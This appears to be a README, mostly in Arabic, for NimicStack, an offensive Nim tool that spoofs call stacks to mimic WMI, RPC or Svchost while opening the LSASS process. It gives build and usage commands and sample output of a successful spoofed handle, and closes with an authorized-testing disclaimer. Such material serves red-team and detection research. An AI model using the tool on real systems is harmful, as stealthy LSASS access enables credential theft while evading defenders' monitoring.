
NimicStack is the pure Nim implementation of Call Stack Spoofing technique to mimic legitimate programs
NimicStack هو تطبيق Nim خالص لتقنية انتحال مكدس الاستدعاءات (Call Stack Spoofing) لمحاكاة البرامج الشرعية. المشروع بأكمله مبني على إثبات المفهوم الذي شاركته WithSecure Labs
يمكنك ترجمة الكود المصدري مباشرةً باستخدام الأمر التالي:
nim c -d=mingw --app=console --cpu=amd64 -o:NimicStack.exe .\Main.nim
في حال حصولك على الخطأ "cannot open file"، يجب عليك أيضًا تثبيت التبعيات المطلوبة:
nimble install ptr_math winim
كما هو الحال في المشروع المرجعي، يمكن لـ NimicStack محاكاة ثلاث مكدسات استدعاءات نموذجية وهي WMI وRPC وSvchost أثناء فتح عملية LSASS.
.\NimicStack.exe <--wmi, --rpc, --svchost>
مثال على مخرجات مكدس استدعاءات WMI المُحاكى:
PS C:\Users\test\Desktop\NimicStack> .\NimicStack.exe --wmi
███╗ ██╗██╗███╗ ███╗██╗ ██████╗███████╗████████╗ █████╗ ██████╗██╗ ██╗
████╗ ██║██║████╗ ████║██║██╔════╝██╔════╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝
██╔██╗ ██║██║██╔████╔██║██║██║ ███████╗ ██║ ███████║██║ █████╔╝
██║╚██╗██║██║██║╚██╔╝██║██║██║ ╚════██║ ██║ ██╔══██║██║ ██╔═██╗
██║ ╚████║██║██║ ╚═╝ ██║██║╚██████╗███████║ ██║ ██║ ██║╚██████╗██║ ██╗
╚═╝ ╚═══╝╚═╝╚═╝ ╚═╝╚═╝ ╚═════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝
@R0h1rr1m
[+] wmi frame is selected!
[+] Required libraries were imported for return address calculation!
[+] SeDebugPrivilege is enabled!
[+] Fake Call Stack was created!
[+] Trying to find LSASS pid...
[+] LSASS pid found!: 756
[+] Registers were set for NtOpenProcess call!
[+] VEH callback was set for the suspended thread!
[+] Thread is resuming...
[+] VEH callback was called!
[+] Redirecting thread to RtlExitUserThread...
[+] Spoof is successful! Handle is 356
[+] You can check the spoofed call stack from Sysmon!
لأغراض اختبار الأمان المصرح به فقط. إساءة استخدام هذه الأداة ضد الأنظمة دون إذن صريح أمر غير قانوني.